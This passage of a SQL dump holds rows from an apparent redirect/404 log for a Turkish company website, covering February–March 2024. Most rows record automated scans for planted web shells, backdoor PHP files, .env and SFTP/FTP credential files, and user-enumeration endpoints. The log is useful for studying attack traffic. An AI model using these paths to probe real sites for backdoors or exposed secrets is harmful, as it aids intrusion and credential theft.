00:00:00',301),(34143,'http://3s-technologies.com.tr/tr/wp-includes/id3/about.php',NULL,'http://3s-technologies.com.tr/wp-includes/ID3/about.php','',229,0,'2024-02-06 02:07:20','0000-00-00 00:00:00',301),(34144,'http://3s-technologies.com.tr/tr/wp-includes/id3/wp-login.php',NULL,'http://3s-technologies.com.tr/wp-includes/ID3/wp-login.php','',14,0,'2024-02-06 02:07:23','0000-00-00 00:00:00',301),(34145,'http://3s-technologies.com.tr/tr/wp-content/plugins/alfa-rex.php',NULL,'http://3s-technologies.com.tr/wp-content/plugins/alfa-rex.php','',14,0,'2024-02-06 02:07:25','0000-00-00 00:00:00',301),(34146,'http://3s-technologies.com.tr/tr/wp-content/themes/about.php',NULL,'http://3s-technologies.com.tr/wp-content/themes/about.php','',346,0,'2024-02-06 02:07:27','0000-00-00 00:00:00',301),(34147,'http://3s-technologies.com.tr/en/nf_tracking.php',NULL,'www.google.com','',5,0,'2024-02-06 10:11:57','0000-00-00 00:00:00',301),(34148,'http://3s-technologies.com.tr/en/bitrix/admin/htmleditor2/aipkey.php?test=hello',NULL,'','',1,0,'2024-02-07 19:39:28','0000-00-00 00:00:00',301),(34149,'http://3s-technologies.com.tr/en/sites/all/themes/views/views.php?test=hello',NULL,'','',1,0,'2024-02-07 19:39:30','0000-00-00 00:00:00',301),(34150,'http://3s-technologies.com.tr/en/themes/vtheme/views.php.jpg?test=hello',NULL,'','',1,0,'2024-02-07 19:39:31','0000-00-00 00:00:00',301),(34151,'https://www.3s-technologies.com.tr/en/templates/beez5/images/vm-preloader.gif',NULL,'https://www.3s-technologies.com.tr/templates/beez5/css/vmsite-ltr.css?vmver=1ca80efd','',2,0,'2024-02-07 22:35:16','0000-00-00 00:00:00',301),(34152,'https://www.3s-technologies.com.tr/en/.jpg',NULL,'https://www.3s-technologies.com.tr/en/products-en/dalga-lehim/spartan-8s-8d-44-detail?tmpl=component','',1,0,'2024-02-07 23:20:34','0000-00-00 00:00:00',301),(34153,'https://3s-technologies.com.tr/tr/aluminyum-işleme-aluminum-processing/',NULL,'','',4,0,'2024-02-08 05:24:36','0000-00-00 00:00:00',301),(34154,'http://www.3s-technologies.com.tr/en/sitemap.xml',NULL,'http://www.3s-technologies.com.tr/sitemap.xml','',3,0,'2024-02-09 21:45:25','0000-00-00 00:00:00',301),(34155,'http://3s-technologies.com.tr/tr/wp-content/plugins/better-search-replace/readme.txt',NULL,'','',2,0,'2024-02-10 02:24:55','0000-00-00 00:00:00',301),(34156,'https://3s-technologies.com.tr/tr/wp-content/plugins/better-search-replace/readme.txt',NULL,'','',2,0,'2024-02-10 02:24:55','0000-00-00 00:00:00',301),(34157,'https://3s-technologies.com.tr/en/sitemap_index/xml',NULL,'','',1,0,'2024-02-11 04:58:31','0000-00-00 00:00:00',301),(34158,'http://3s-technologies.com.tr/en/chosen.php',NULL,'www.google.com','',148,0,'2024-02-11 14:32:16','0000-00-00 00:00:00',301),(34159,'https://3s-technologies.com.tr/tr/contact',NULL,'https://3s-technologies.com.tr/contact','',10,0,'2024-02-12 00:23:20','0000-00-00 00:00:00',301),(34160,'http://3s-technologies.com.tr/tr/cfide/administrator/index.cfm',NULL,'http://3s-technologies.com.tr//CFIDE/administrator/','',1,0,'2024-02-12 06:06:48','0000-00-00 00:00:00',301),(34161,'http://3s-technologies.com.tr/tr/wp-content/plugins/woo-thank-you-page-nextmove-lite/assets/css/xlwcty-public-rest.css',NULL,'','',1,0,'2024-02-13 11:57:00','0000-00-00 00:00:00',301),(34162,'http://3s-technologies.com.tr/en/env',NULL,'','',2,0,'2024-02-15 08:58:34','0000-00-00 00:00:00',301),(34163,'http://3s-technologies.com.tr/en/services/.env',NULL,'','',1,0,'2024-02-15 08:58:37','0000-00-00 00:00:00',301),(34164,'http://3s-technologies.com.tr/en/service/.env',NULL,'','',1,0,'2024-02-15 08:58:38','0000-00-00 00:00:00',301),(34165,'http://3s-technologies.com.tr/en/demo/.env',NULL,'','',1,0,'2024-02-15 08:58:39','0000-00-00 00:00:00',301),(34166,'http://3s-technologies.com.tr/en/env.txt',NULL,'','',1,0,'2024-02-15 08:58:39','0000-00-00 00:00:00',301),(34167,'http://3s-technologies.com.tr/en/local/.env',NULL,'','',1,0,'2024-02-15 08:58:40','0000-00-00 00:00:00',301),(34168,'http://3s-technologies.com.tr/en/blog1/.env',NULL,'','',1,0,'2024-02-15 08:58:42','0000-00-00 00:00:00',301),(34169,'http://3s-technologies.com.tr/en/.env.dev',NULL,'','',3,0,'2024-02-15 08:58:43','0000-00-00 00:00:00',301),(34170,'http://3s-technologies.com.tr/en/home/.env',NULL,'','',1,0,'2024-02-15 08:58:43','0000-00-00 00:00:00',301),(34171,'http://3s-technologies.com.tr/en/.env1',NULL,'','',1,0,'2024-02-15 08:58:45','0000-00-00 00:00:00',301),(34172,'http://3s-technologies.com.tr/en/website/.env',NULL,'','',1,0,'2024-02-15 08:58:45','0000-00-00 00:00:00',301),(34173,'http://3s-technologies.com.tr/tr/modules/mod_djimageslider/themes/default/sftp-config.json',NULL,'','',2,0,'2024-02-16 06:54:41','0000-00-00 00:00:00',301),(34174,'http://3s-technologies.com.tr/tr/modules/mod_djimageslider/themes/default/.vscode/sftp.json',NULL,'','',2,0,'2024-02-16 06:54:42','0000-00-00 00:00:00',301),(34175,'http://3s-technologies.com.tr/tr/modules/mod_djimageslider/themes/default/.ftpconfig',NULL,'','',2,0,'2024-02-16 06:54:43','0000-00-00 00:00:00',301),(34176,'http://3s-technologies.com.tr/tr/modules/mod_djimageslider/themes/default/ftpsync.settings',NULL,'','',2,0,'2024-02-16 06:54:45','0000-00-00 00:00:00',301),(34177,'http://www.3s-technologies.com.tr/en/wp-content/plugins/about.php',NULL,'www.google.com','',1,0,'2024-02-16 10:29:28','0000-00-00 00:00:00',301),(34178,'http://www.3s-technologies.com.tr/en/wp-content/themes/about.php',NULL,'www.google.com','',1,0,'2024-02-16 10:29:35','0000-00-00 00:00:00',301),(34179,'http://3s-technologies.com.tr/tr/wp-json/wpgmza/v1/markers',NULL,'','',3,0,'2024-02-19 18:55:28','0000-00-00 00:00:00',301),(34180,'https://3s-technologies.com.tr/tr/wp-json/wpgmza/v1/markers',NULL,'','',3,0,'2024-02-19 18:55:29','0000-00-00 00:00:00',301),(34181,'http://www.3s-technologies.com.tr/en/wp-content/lol.php',NULL,'www.google.com','',1,0,'2024-02-20 05:52:45','0000-00-00 00:00:00',301),(34182,'http://www.3s-technologies.com.tr/en/lol.php',NULL,'www.google.com','',1,0,'2024-02-20 05:53:16','0000-00-00 00:00:00',301),(34183,'http://www.3s-technologies.com.tr/en/wp-includes/lol.php',NULL,'www.google.com','',1,0,'2024-02-20 05:53:18','0000-00-00 00:00:00',301),(34184,'http://3s-technologies.com.tr/tr/wp-includes/style-engine/about.php',NULL,'','',198,0,'2024-02-23 02:32:58','0000-00-00 00:00:00',301),(34185,'http://3s-technologies.com.tr/tr/wp-includes/simplepie/about.php',NULL,'','',174,0,'2024-02-23 02:32:59','0000-00-00 00:00:00',301),(34186,'http://3s-technologies.com.tr/tr/wp-content/banners/about.php',NULL,'','',70,0,'2024-02-23 02:33:00','0000-00-00 00:00:00',301),(34187,'http://3s-technologies.com.tr/tr/.well-known/about.php',NULL,'','',122,0,'2024-02-23 02:33:00','0000-00-00 00:00:00',301),(34188,'http://3s-technologies.com.tr/tr/img/about.php',NULL,'','',61,0,'2024-02-23 02:33:02','0000-00-00 00:00:00',301),(34189,'http://3s-technologies.com.tr/tr/wp-content/languages/about.php',NULL,'','',132,0,'2024-02-23 02:33:02','0000-00-00 00:00:00',301),(34190,'http://3s-technologies.com.tr/tr/wp-includes/customize/about.php',NULL,'','',193,0,'2024-02-23 02:33:02','0000-00-00 00:00:00',301),(34191,'http://3s-technologies.com.tr/tr/wp-includes.bak/html-api/about.php',NULL,'','',63,0,'2024-02-23 02:33:03','0000-00-00 00:00:00',301),(34192,'http://3s-technologies.com.tr/tr/wp-includes/pomo/about.php',NULL,'','',146,0,'2024-02-23 02:33:06','0000-00-00 00:00:00',301),(34193,'http://3s-technologies.com.tr/tr/wp-includes/block-patterns/about.php',NULL,'','',131,0,'2024-02-23 02:33:06','0000-00-00 00:00:00',301),(34194,'http://3s-technologies.com.tr/tr/wp-content/updraft/about.php',NULL,'','',65,0,'2024-02-23 02:33:06','0000-00-00 00:00:00',301),(34195,'http://3s-technologies.com.tr/tr/wp-content/upgrade-temp-backup/about.php',NULL,'','',110,0,'2024-02-23 02:33:07','0000-00-00 00:00:00',301),(34196,'http://3s-technologies.com.tr/tr/wp-content/blogs.dir/about.php',NULL,'','',65,0,'2024-02-23 02:33:09','0000-00-00 00:00:00',301),(34197,'http://3s-technologies.com.tr/tr/wp-includes/images/about.php',NULL,'','',140,0,'2024-02-23 02:33:09','0000-00-00 00:00:00',301),(34198,'http://3s-technologies.com.tr/tr/cgi-bin/about.php',NULL,'','',43,0,'2024-02-23 02:33:10','0000-00-00 00:00:00',301),(34199,'http://3s-technologies.com.tr/tr/wp-content/gallery/about.php',NULL,'','',94,0,'2024-02-23 02:33:10','0000-00-00 00:00:00',301),(34200,'http://3s-technologies.com.tr/tr/wp-includes/blocks/about.php',NULL,'','',152,0,'2024-02-23 02:33:10','0000-00-00 00:00:00',301),(34201,'http://3s-technologies.com.tr/tr/wp-admin/css/about.php',NULL,'','',177,0,'2024-02-23 02:33:11','0000-00-00 00:00:00',301),(34202,'http://3s-technologies.com.tr/tr/wp-admin/images/about.php',NULL,'','',177,0,'2024-02-23 02:33:12','0000-00-00 00:00:00',301),(34203,'http://3s-technologies.com.tr/tr/avaa.php',NULL,'','',121,0,'2024-02-23 02:33:17','0000-00-00 00:00:00',301),(34204,'http://www.3s-technologies.com.tr/tr/components/com_joomfish/images/flags/en.gif',NULL,'','',4,0,'2024-02-24 04:56:54','0000-00-00 00:00:00',301),(34205,'https://3s-technologies.com.tr/tr/wp-json?rest_route=/wp/v2/users/',NULL,'https://3s-technologies.com.tr/wp-json/?rest_route=/wp/v2/users/','',1,0,'2024-02-25 16:24:12','0000-00-00 00:00:00',301),(34206,'http://3s-technologies.com.tr/tr/images/stories/virtuemart/product/kopyas',NULL,'','',1,0,'2024-02-26 00:51:36','0000-00-00 00:00:00',301),(34207,'http://www.3s-technologies.com.tr/en/wp-admin/maint/index.php',NULL,'www.google.com','',1,0,'2024-02-26 01:21:14','0000-00-00 00:00:00',301),(34208,'http://www.3s-technologies.com.tr/en/wp-admin/js/widgets/content.php',NULL,'www.google.com','',1,0,'2024-02-26 01:21:21','0000-00-00 00:00:00',301),(34209,'https://www.3s-technologies.com.tr/tr/ã¼rã¼nler/trident-detail',NULL,'','',4,0,'2024-02-26 02:47:57','0000-00-00 00:00:00',301),(34210,'https://3s-technologies.com.tr/tr/feed/atom',NULL,'','',2,0,'2024-02-26 05:05:11','0000-00-00 00:00:00',301),(34211,'http://3s-technologies.com.tr/en/blog/wp-admin/setup-config.php?step=1',NULL,'','',1,0,'2024-02-26 06:51:05','0000-00-00 00:00:00',301),(34212,'https://3s-technologies.com.tr/en/blog/xmlrpc.php',NULL,'','',9,0,'2024-02-27 20:00:24','0000-00-00 00:00:00',301),(34213,'http://3s-technologies.com.tr/tr/wp-content/themes/bricks/assets/js/feedback.min.js',NULL,'','',3,0,'2024-02-29 08:48:02','0000-00-00 00:00:00',301),(34214,'https://www.3s-technologies.com.tr/en/home-en/81-english-uk/english-content/80-panasonic-am100-kampanya',NULL,'','',5,0,'2024-02-29 09:30:52','0000-00-00 00:00:00',301),(34215,'http://3s-technologies.com.tr/en/wp-includes/js/jquery/jquery.min.js',NULL,'www.google.com','',5,0,'2024-03-01 21:59:49','0000-00-00 00:00:00',301),(34216,'http://www.3s-technologies.com.tr/tr/plug/comment/comment.html',NULL,'http://www.3s-technologies.com.tr/plug/comment/comment.html','',2,0,'2024-03-02 12:31:15','0000-00-00 00:00:00',301),(34217,'https://3s-technologies.com.tr/tr/api/index.php/v1/users?public=true',NULL,'','',3,0,'2024-03-02 16:06:38','0000-00-00 00:00:00',301),(34218,'https://3s-technologies.com.tr/tr/https:/adsensetalk.online',NULL,'','',1,0,'2024-03-03 16:56:53','0000-00-00 00:00:00',301),(34219,'http://3s-technologies.com.tr/en/admin/filemanager/dialog.php',NULL,'','',2,0,'2024-03-03 18:22:59','0000-00-00 00:00:00',301),(34220,'http://3s-technologies.com.tr/en/js/filemanager/dialog.php',NULL,'','',2,0,'2024-03-03 18:23:00','0000-00-00 00:00:00',301),(34221,'http://3s-technologies.com.tr/en/assets/administrator/filemanager/dialog.php',NULL,'','',2,0,'2024-03-03 18:23:01','0000-00-00 00:00:00',301),(34222,'http://3s-technologies.com.tr/en/assets/admin/js/filemanager/dialog.php',NULL,'','',2,0,'2024-03-03 18:23:02','0000-00-00 00:00:00',301),(34223,'http://3s-technologies.com.tr/en/assets/plugins/filemanager/dialog.php',NULL,'','',2,0,'2024-03-03 18:23:03','0000-00-00 00:00:00',301),(34224,'http://3s-technologies.com.tr/en/assets/filemanager/dialog.php',NULL,'','',4,0,'2024-03-03 18:23:04','0000-00-00 00:00:00',301),(34225,'http://3s-technologies.com.tr/tr/wp-content/plugins/userpro/css/userpro.min.css',NULL,'','',1,0,'2024-03-04 16:48:48','0000-00-00 00:00:00',301),(34226,'http://3s-technologies.com.tr/tr/wp-content/themes/bricks/style.css',NULL,'','',3,0,'2024-03-04 16:48:49','0000-00-00 00:00:00',301),(34227,'https://3s-technologies.com.tr/json/setup-restore.action?synchronous=true',NULL,'','',1,0,'2024-03-05 16:53:03','0000-00-00 00:00:00',301),(34228,'https://3s-technologies.com.tr/en/chosen.php',NULL,'www.google.com','',6,0,'2024-03-06 02:48:47','0000-00-00 00:00:00',301),(34229,'https://3s-technologies.com.tr/en/about.php?520',NULL,'www.google.com','',3,0,'2024-03-06 02:49:04','0000-00-00 00:00:00',301),(34230,'https://3s-technologies.com.tr/en/wp-content/about.php?520',NULL,'www.google.com','',1,0,'2024-03-06 02:49:16','0000-00-00 00:00:00',301),(34231,'https://3s-technologies.com.tr/en/wp-content/admin.php?520',NULL,'www.google.com','',1,0,'2024-03-06 02:49:37','0000-00-00 00:00:00',301),(34232,'http://www.3s-technologies.com.tr/tr/wp-json?rest_route=/wp/v2/users/',NULL,'http://www.3s-technologies.com.tr/wp-json/?rest_route=/wp/v2/users/','',1,0,'2024-03-06 10:27:15','0000-00-00 00:00:00',301),(34233,'https://3s-technologies.com.tr/en/input.php',NULL,'www.google.com','',2,0,'2024-03-06 19:54:48','0000-00-00 00:00:00',301),(34234,'http://www.3s-technologies.com.tr/tr/e/data/html/postinfo.js',NULL,'http://www.3s-technologies.com.tr/e/data/html/postinfo.js','',4,0,'2024-03-07 10:41:12','0000-00-00 00:00:00',301),(34235,'http://3s-technologies.com.tr/tr/wp-content/plugins/auxin-elements/public/assets/js/plugins.js',NULL,'','',1,0,'2024-03-09 20:13:47','0000-00-00 00:00:00',301),(34236,'https://3s-technologies.com.tr/tr//administrator/',NULL,'','',3,0,'2024-03-09 22:40:25','0000-00-00 00:00:00',301),(34237,'http://www.3s-technologies.com.tr/tr/include/js/jquery/jquery.hotkeys.js',NULL,'http://www.3s-technologies.com.tr/include/js/jquery/jquery.hotkeys.js','',1,0,'2024-03-10 03:02:18','0000-00-00 00:00:00',301),(34238,'https://www.3s-technologies.com.tr/tr/ã¼rã¼nler/manufacturer/ddm-novastar/dalga-lehim',NULL,'','',2,0,'2024-03-10 12:44:32','0000-00-00 00:00:00',301),(34239,'http://3s-technologies.com.tr/tr/wp-includes/js/jquery/jquery.min.js',NULL,'','',4,0,'2024-03-11 19:38:03','0000-00-00 00:00:00',301),(34240,'http://3s-technologies.com.tr/tr/.well-known/fierzashell.php',NULL,'','',10,0,'2024-03-12 05:58:44','0000-00-00 00:00:00',301),(34241,'http://3s-technologies.com.tr/tr/modules/mod_rebug/manifest.xml',NULL,'','',5,0,'2024-03-13 05:42:11','0000-00-00 00:00:00',301),(34242,'http://3s-technologies.com.tr/tr/wp-content/plugins/royal-elementor-addons/assets/css/frontend.min.css',NULL,'','',2,0,'2024-03-14 15:28:02','0000-00-00 00:00:00',301),(34243,'https://3s-technologies.com.tr/tr/modules/mod_rebug/manifest.xml',NULL,'','',8,0,'2024-03-14 19:44:14','0000-00-00 00:00:00',301),(34244,'http://3s-technologies.com.tr/tr/api/index.php/v1/users?public=true',NULL,'','',1,0,'2024-03-15 13:48:45','0000-00-00 00:00:00',301),(34245,'http://3s-technologies.com.tr/tr/adminfuns.php7',NULL,'','',58,0,'2024-03-15 19:32:00','0000-00-00 00:00:00',301),(34246,'http://3s-technologies.com.tr/tr/ebs.php7',NULL,'','',58,0,'2024-03-15 19:32:00','0000-00-00 00:00:00',301),(34247,'http://3s-technologies.com.tr/tr/ws.php7',NULL,'','',68,0,'2024-03-15 19:32:01','0000-00-00 00:00:00',301),(34248,'http://3s-technologies.com.tr/tr/alfanew2.php7',NULL,'','',67,0,'2024-03-15 19:32:01','0000-00-00 00:00:00',301),(34249,'http://3s-technologies.com.tr/tr/alfa-rex2.php7',NULL,'','',64,0,'2024-03-15 19:32:02','0000-00-00 00:00:00',301),(34250,'http://3s-technologies.com.tr/tr/wp-admin/images/index.php',NULL,'','',256,0,'2024-03-15 19:32:02','0000-00-00 00:00:00',301),(34251,'http://3s-technologies.com.tr/tr/wp-admin/css/colors/index.php',NULL,'','',217,0,'2024-03-15 19:32:03','0000-00-00 00:00:00',301),(34252,'http://3s-technologies.com.tr/tr/modules/mod_review/manifest.xml',NULL,'','',5,0,'2024-03-16 00:34:22','0000-00-00 00:00:00',301),(34253,'http://3s-technologies.com.tr/en/.well-known/fierzashell.php',NULL,'www.google.com','',4,0,'2024-03-16 20:52:56','0000-00-00 00:00:00',301),(34254,'https://3s-technologies.com.tr/en/.well-known/pki-validation/x.php',NULL,'www.google.com','',2,0,'2024-03-16 20:52:57','0000-00-00 00:00:00',301),(34255,'http://3s-technologies.com.tr/en/b0.php',NULL,'www.google.com','',2,0,'2024-03-16 20:52:57','0000-00-00 00:00:00',301),(34256,'https://www.3s-technologies.com.tr/tr/ã¼rã¼nler/bã¶lgesel-lehimleme/ess-310-24-detail',NULL,'','',1,0,'2024-03-16 23:43:38','0000-00-00 00:00:00',301),(34257,'http://www.3s-technologies.com.tr/tr/templets/system/part_type_list.htm',NULL,'http://www.3s-technologies.com.tr/templets/system/part_type_list.htm','',1,0,'2024-03-18 13:14:27','0000-00-00 00:00:00',301),(34258,'http://3s-technologies.com.tr/tr/wp-content/plugins/custom-registration-form-builder-with-submission-manager/public/js/bootstrap.min.js',NULL,'','',1,0,'2024-03-18 16:56:57','0000-00-00 00:00:00',301),(34259,'http://3s-technologies.com.tr/en/wp-includes/mah.php',NULL,'www.google.com','',3,0,'2024-03-20 02:29:11','0000-00-00 00:00:00',301),(34260,'https://3s-technologies.com.tr/integration/savegangster.action',NULL,'','',1,0,'2024-03-20 13:59:03','0000-00-00 00:00:00',301),(34261,'http://3s-technologies.com.tr/en/defaults.php',NULL,'www.google.com','',52,0,'2024-03-20 16:02:06','0000-00-00 00:00:00',301),(34262,'http://www.3s-technologies.com.tr/tr/1234.php',NULL,'http://www.3s-technologies.com.tr/1234.php','',1,0,'2024-03-22 02:04:45','0000-00-00 00:00:00',301),(34263,'https://3s-technologies.com.tr/tr/wp-json/wp/v2/posts?per_page=1&page=1',NULL,'https://www.google.com/','',1,0,'2024-03-22 07:45:32','0000-00-00 00:00:00',301),(34264,'http://3s-technologies.com.tr/tr/wp-content/plugins/wp-automatic/css/style.css',NULL,'','',6,0,'2024-03-22 20:16:37','0000-00-00 00:00:00',301),(34265,'http://3s-technologies.com.tr/tr/images/991176.php',NULL,'http://3s-technologies.com.tr/images/991176.php','',1,0,'2024-03-23 13:24:43','0000-00-00 00:00:00',301),(34266,'http://3s-technologies.com.tr/tr/plugins/991176.php',NULL,'http://3s-technologies.com.tr/plugins/991176.php','',1,0,'2024-03-23 13:24:46','0000-00-00 00:00:00',301),(34267,'http://3s-technologies.com.tr/tr/components/991176.php',NULL,'http://3s-technologies.com.tr/components/991176.php','',1,0,'2024-03-23 13:24:54','0000-00-00 00:00:00',301),(34268,'http://3s-technologies.com.tr/tr/plugins/editors/jce/tiny_mce/plugins/advcode/img/wp-updatee.php',NULL,'http://3s-technologies.com.tr/plugins/editors/jce/tiny_mce/plugins/advcode/img/wp-updatee.php','',1,0,'2024-03-23 13:25:03','0000-00-00 00:00:00',301),(34269,'http://3s-technologies.com.tr/tr/language/991176.php',NULL,'http://3s-technologies.com.tr/language/991176.php','',2,0,'2024-03-23 13:35:14','0000-00-00 00:00:00',301),(34270,'http://3s-technologies.com.tr/tr/tmp/wjiobqzid.php',NULL,'http://3s-technologies.com.tr/tmp/wjiobqzid.php','',2,0,'2024-03-23 13:41:57','0000-00-00 00:00:00',301),(34271,'http://3s-technologies.com.tr/tr/administrator/templates/atum/html/layouts/chromes/global.php',NULL,'http://3s-technologies.com.tr/administrator/templates/atum/html/layouts/chromes/global.php','',1,0,'2024-03-23 14:14:39','0000-00-00 00:00:00',301),(34272,'http://3s-technologies.com.tr/tr/images/stories/food.php.j',NULL,'http://3s-technologies.com.tr/images/stories/food.php.j','',1,0,'2024-03-23 14:14:41','0000-00-00 00:00:00',301),(34273,'http://3s-technologies.com.tr/tr/modules/991176.php',NULL,'http://3s-technologies.com.tr/modules/991176.php','',1,0,'2024-03-23 14:14:46','0000-00-00 00:00:00',301),(34274,'http://3s-technologies.com.tr/tr/libraries/cms/schema/feed-rss-class.php',NULL,'http://3s-technologies.com.tr/libraries/cms/schema/feed-rss-class.php','',2,0,'2024-03-23 14:41:34','0000-00-00 00:00:00',301),(34275,'http://3s-technologies.com.tr/tr/cache/create.php',NULL,'http://3s-technologies.com.tr/cache/create.php','',1,0,'2024-03-23 14:42:19','0000-00-00 00:00:00',301),(34276,'http://3s-technologies.com.tr/tr/tmp/991176.php',NULL,'http://3s-technologies.com.tr/tmp/991176.php','',1,0,'2024-03-23 15:04:01','0000-00-00 00:00:00',301),(34277,'http://3s-technologies.com.tr/tr/installation_bak/991176.php',NULL,'http://3s-technologies.com.tr/installation_bak/991176.php','',1,0,'2024-03-23 15:31:16','0000-00-00 00:00:00',301),(34278,'http://3s-technologies.com.tr/tr/templates/991176.php',NULL,'http://3s-technologies.com.tr/templates/991176.php','',1,0,'2024-03-23 15:52:49','0000-00-00 00:00:00',301),(34279,'http://3s-technologies.com.tr/tr/clsleakcm0v61.php',NULL,'http://3s-technologies.com.tr/clsleakcm0v61.php','',1,0,'2024-03-23 15:52:55','0000-00-00 00:00:00',301),(34280,'http://3s-technologies.com.tr/tr/administrator/991176.php',NULL,'http://3s-technologies.com.tr/administrator/991176.php','',1,0,'2024-03-23 16:02:41','0000-00-00 00:00:00',301),(34281,'http://3s-technologies.com.tr/tr/tmp/bogel.php.1',NULL,'http://3s-technologies.com.tr/tmp/bogel.php.1','',1,0,'2024-03-23 16:12:49','0000-00-00 00:00:00',301),(34282,'http://3s-technologies.com.tr/tr/plugins/editors-xtd/pagebreak/log.php',NULL,'http://3s-technologies.com.tr/plugins/editors-xtd/pagebreak/log.php','',4,0,'2024-03-23 16:35:35','0000-00-00 00:00:00',301),(34283,'http://3s-technologies.com.tr/tr/images/sampledata/fruitshop/rss.class.php',NULL,'http://3s-technologies.com.tr/images/sampledata/fruitshop/rss.class.php','',1,0,'2024-03-23 16:35:38','0000-00-00 00:00:00',301),(34284,'http://3s-technologies.com.tr/tr/components/com_jce/editor/tiny_mce/plugins/fontsizeselect/classes/wp-blogg.php',NULL,'http://3s-technologies.com.tr/components/com_jce/editor/tiny_mce/plugins/fontsizeselect/classes/wp-blogg.php','',1,0,'2024-03-23 17:00:33','0000-00-00 00:00:00',301),(34285,'http://3s-technologies.com.tr/tr/images/izanami.php',NULL,'http://3s-technologies.com.tr/images/izanami.php','',1,0,'2024-03-23 17:09:23','0000-00-00 00:00:00',301),(34286,'http://3s-technologies.com.tr/tr/media/991176.php',NULL,'http://3s-technologies.com.tr/media/991176.php','',1,0,'2024-03-23 17:15:55','0000-00-00 00:00:00',301),(34287,'http://3s-technologies.com.tr/tr/language/overrides/a.php',NULL,'http://3s-technologies.com.tr/language/overrides/a.php','',3,0,'2024-03-23 17:16:11','0000-00-00 00:00:00',301),(34288,'http://3s-technologies.com.tr/tr/cgi-bin/991176.php',NULL,'http://3s-technologies.com.tr/cgi-bin/991176.php','',1,0,'2024-03-23 17:42:24','0000-00-00 00:00:00',301),(34289,'http://3s-technologies.com.tr/tr/cache/991176.php',NULL,'http://3s-technologies.com.tr/cache/991176.php','',1,0,'2024-03-23 17:50:24','0000-00-00 00:00:00',301),(34290,'http://3s-technologies.com.tr/tr/plugins/editors/wp-blogg.php',NULL,'http://3s-technologies.com.tr/plugins/editors/wp-blogg.php','',1,0,'2024-03-23 18:00:19','0000-00-00 00:00:00',301),(34291,'http://3s-technologies.com.tr/tr/includes/991176.php',NULL,'http://3s-technologies.com.tr/includes/991176.php','',2,0,'2024-03-23 18:15:34','0000-00-00 00:00:00',301),(34292,'http://3s-technologies.com.tr/tr/images/wjiobqzid.php',NULL,'http://3s-technologies.com.tr/images/wjiobqzid.php','',1,0,'2024-03-23 18:41:08','0000-00-00 00:00:00',301),(34293,'http://3s-technologies.com.tr/tr/ova0u7kb.php.suspected',NULL,'http://3s-technologies.com.tr/ova0u7kb.php.suspected','',1,0,'2024-03-23 18:49:18','0000-00-00 00:00:00',301),(34294,'http://3s-technologies.com.tr/tr/libraries/991176.php',NULL,'http://3s-technologies.com.tr/libraries/991176.php','',1,0,'2024-03-23 19:04:58','0000-00-00 00:00:00',301),(34295,'http://3s-technologies.com.tr/tr/components/com_jce/editor/tiny_mce/plugins/charmap/tmpl/wp-updatee.php',NULL,'http://3s-technologies.com.tr/components/com_jce/editor/tiny_mce/plugins/charmap/tmpl/wp-updatee.php','',1,0,'2024-03-23 19:28:51','0000-00-00 00:00:00',301),(34296,'http://3s-technologies.com.tr/tr/modules/mod_wrapper/class.php',NULL,'http://3s-technologies.com.tr/modules/mod_wrapper/class.php','',1,0,'2024-03-23 19:38:31','0000-00-00 00:00:00',301),(34297,'http://3s-technologies.com.tr/tr/images/info1.php',NULL,'http://3s-technologies.com.tr/images/info1.php','',1,0,'2024-03-23 20:31:03','0000-00-00 00:00:00',301),(34298,'http://3s-technologies.com.tr/tr/images/rkvaqccac.php',NULL,'http://3s-technologies.com.tr/images/rkvaqccac.php','',1,0,'2024-03-24 09:33:18','0000-00-00 00:00:00',301),(34299,'http://3s-technologies.com.tr/tr/administrator/components/com_phocamaps/front/assets/images/igreen/wp-updatee.php',NULL,'http://3s-technologies.com.tr/administrator/components/com_phocamaps/front/assets/images/igreen/wp-updatee.php','',1,0,'2024-03-24 09:49:21','0000-00-00 00:00:00',301),(34300,'http://3s-technologies.com.tr/tr/tmp/nftkgnlpn.php.suspected',NULL,'http://3s-technologies.com.tr/tmp/nftkgnlpn.php.suspected','',1,0,'2024-03-24 09:49:23','0000-00-00 00:00:00',301),(34301,'http://3s-technologies.com.tr/tr/includes/setting.php',NULL,'http://3s-technologies.com.tr/includes/setting.php','',1,0,'2024-03-24 09:50:39','0000-00-00 00:00:00',301),(34302,'http://3s-technologies.com.tr/tr/images/error_exception.php',NULL,'http://3s-technologies.com.tr/images/error_exception.php','',1,0,'2024-03-24 09:51:14','0000-00-00 00:00:00',301),(34303,'http://3s-technologies.com.tr/tr/tmp/rkvaqccac.php',NULL,'http://3s-technologies.com.tr/tmp/rkvaqccac.php','',1,0,'2024-03-24 09:51:23','0000-00-00 00:00:00',301),(34304,'http://3s-technologies.com.tr/tr/components/com_content/models/green.php',NULL,'http://3s-technologies.com.tr/components/com_content/models/green.php','',1,0,'2024-03-24 10:23:51','0000-00-00 00:00:00',301),(34305,'http://3s-technologies.com.tr/tr/rkvaqccac.php',NULL,'http://3s-technologies.com.tr/rkvaqccac.php','',2,0,'2024-03-24 10:23:54','0000-00-00 00:00:00',301),(34306,'http://3s-technologies.com.tr/tr/images/stories/vulns.php.suspected',NULL,'http://3s-technologies.com.tr/images/stories/vulns.php.suspected','',1,0,'2024-03-24 10:23:55','0000-00-00 00:00:00',301),(34307,'http://3s-technologies.com.tr/tr/plugins/editors/jce/tiny_mce/plugins/style/css/wp-blockk.php',NULL,'http://3s-technologies.com.tr/plugins/editors/jce/tiny_mce/plugins/style/css/wp-blockk.php','',1,0,'2024-03-24 10:24:06','0000-00-00 00:00:00',301),(34308,'http://3s-technologies.com.tr/tr/x4.php.suspected',NULL,'http://3s-technologies.com.tr/x4.php.suspected','',1,0,'2024-03-24 10:40:34','0000-00-00 00:00:00',301),(34309,'http://3s-technologies.com.tr/tr/tmp/bdiavkjcn.php',NULL,'http://3s-technologies.com.tr/tmp/bdiavkjcn.php','',1,0,'2024-03-24 10:42:34','0000-00-00 00:00:00',301),(34310,'http://3s-technologies.com.tr/tr/images/stories/mm.php',NULL,'http://3s-technologies.com.tr/images/stories/mm.php','',1,0,'2024-03-24 10:57:21','0000-00-00 00:00:00',301),(34311,'http://3s-technologies.com.tr/tr/images/bdiavkjcn.php',NULL,'http://3s-technologies.com.tr/images/bdiavkjcn.php','',1,0,'2024-03-24 11:04:04','0000-00-00 00:00:00',301),(34312,'http://3s-technologies.com.tr/tr/bw.php',NULL,'http://3s-technologies.com.tr/bw.php','',1,0,'2024-03-24 11:14:05','0000-00-00 00:00:00',301),(34313,'http://3s-technologies.com.tr/tr/payload3.php.suspected',NULL,'http://3s-technologies.com.tr/payload3.php.suspected','',1,0,'2024-03-24 11:38:53','0000-00-00 